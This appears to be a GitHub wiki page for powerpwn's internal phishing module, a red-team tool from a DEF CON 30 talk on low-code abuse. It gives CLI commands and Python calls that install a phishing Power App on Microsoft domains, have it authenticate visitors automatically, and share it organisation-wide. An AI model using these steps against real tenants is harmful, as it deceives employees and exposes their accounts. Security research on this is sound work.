Skip to content

Modules: Internal phishing

Jump to bottom Edit New page
lanasalameh1 edited this page Aug 2, 2023 · 12 revisions

Description

Set up an internal phishing application on a Microsoft-owned domains which will automatically authenticate as users browse to your link.

This capability was first presented at a DEFCON30 talk titled Low Code High Risk - Enterprise Domination via Low Code Abuse:

DEF CON 30 - Michael Bargury - Low Code High Risk - Enterprise Domination via Low Code Abuse

Usage

powerpwn cli

  • Install application by running

    `powerpwn phishing install-app -t {tenant-id} -e {environment-id} --input {path to application package zip} -n {application name}`

  • Get application id and application run url from cmd

image

  • Share application with org by running

    `powerpwn phishing share-app -t {tenant-id} -e {environment-id} -a {app id}`

Python library

from powerpwn.powerphishing.app_installer import AppInstaller

app_installer = AppInstaller(token = "") # access token to powerapps
app_installer.install_app(path_to_zip_file = "", app_display_name = "", env_id = "")
app_installer.share_app_with_org(app_id = "", environment_id = "", tenant_id = "")



Caveat:
Applications with related resources are still not supported

Add a custom footer
Add a custom sidebar
Clone this wiki locally